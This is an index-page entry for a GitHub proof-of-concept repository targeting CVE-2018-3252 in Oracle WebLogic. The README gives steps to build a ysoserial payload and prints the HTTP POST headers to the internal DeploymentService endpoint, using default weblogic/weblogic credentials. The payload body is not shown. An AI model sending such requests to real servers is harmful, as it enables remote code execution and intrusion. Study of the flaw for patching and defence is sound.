Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/pyn3rd/CVE-2018-3252
CVE-2018-3252-PoC
https://github.com/pyn3rd/CVE-2018-3252
Last synced: about 2 months ago
JSON representation
CVE-2018-3252-PoC
- Host: GitHub
- URL: https://github.com/pyn3rd/CVE-2018-3252
- Owner: pyn3rd
- Created: 2018-12-06T13:48:53.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2018-12-07T04:31:50.000Z (about 6 years ago)
- Last Synced: 2024-08-05T17:27:09.925Z (5 months ago)
- Language: Java
- Homepage:
- Size: 585 KB
- Stars: 75
- Watchers: 1
- Forks: 22
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - pyn3rd/CVE-2018-3252 - CVE-2018-3252-PoC (Java)
README
# CVE-2018-3252-PoC
#### 1.Generate PoC with YSOSERIAL
#### 2.You should know the `USERNAME` and `PASSWORD` of the target weblogic server
#### 3.Send the payload to the URL
```
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 127.0.0.1:7001
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
wl_request_type: data_transfer_request
username: weblogic
password: weblogic
serverName: pyn3rd
deployment_request_id: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36 QQBrowser/4.1.4132.400
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Length: 3334
```